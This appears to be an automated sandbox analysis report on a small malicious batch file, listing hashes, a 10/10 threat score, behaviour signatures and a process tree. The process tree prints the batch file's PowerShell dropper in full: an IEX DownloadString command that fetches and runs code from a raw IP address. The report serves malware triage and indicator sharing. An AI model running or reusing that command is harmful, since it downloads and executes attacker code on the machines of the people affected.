Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows10_x64 -
resource
win10v191014 -
submitted
10-02-2020 17:10
Static task
static1
Behavioral task
behavioral1
Sample
j6tiKu2h.bat
Resource
win7v191014
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
j6tiKu2h.bat
Resource
win10v191014
windows10_x64
0 signatures
0 seconds
General
-
Target
j6tiKu2h.bat
-
Size
197B
-
MD5
050369defab123655788bb4b8aab241f
-
SHA1
807cb1878569950049819f6a8122a760bf41624c
-
SHA256
5ce9cc906365d7b8b504d946dd31f3a37c290972ad6966972689524abaa6d12a
-
SHA512
55df33527936776d38b1a893f6e6f621eca96dad1b2d90903213697b7a0d50e274212818b20c06e00fb8d597a11231d6181d53d605e9d0c5b1983d034bf73026
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/j6tiKu2h
Signatures
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 5000 WerFault.exe Token: SeBackupPrivilege 5000 WerFault.exe Token: SeDebugPrivilege 5000 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
Processes:
WerFault.exepid process 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe 5000 WerFault.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid process 5000 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\j6tiKu2h.bat"1⤵PID:4888
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/j6tiKu2h');Invoke-BOKLQKMLWDENMA;Start-Sleep -s 10000"2⤵PID:4932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 7043⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
- Enumerates system info in registry
- Program crash
PID:5000
-
\??\c:\windows\system32\taskhostw.exetaskhostw.exe -RegisterDevice -SettingChange -Full1⤵PID:4612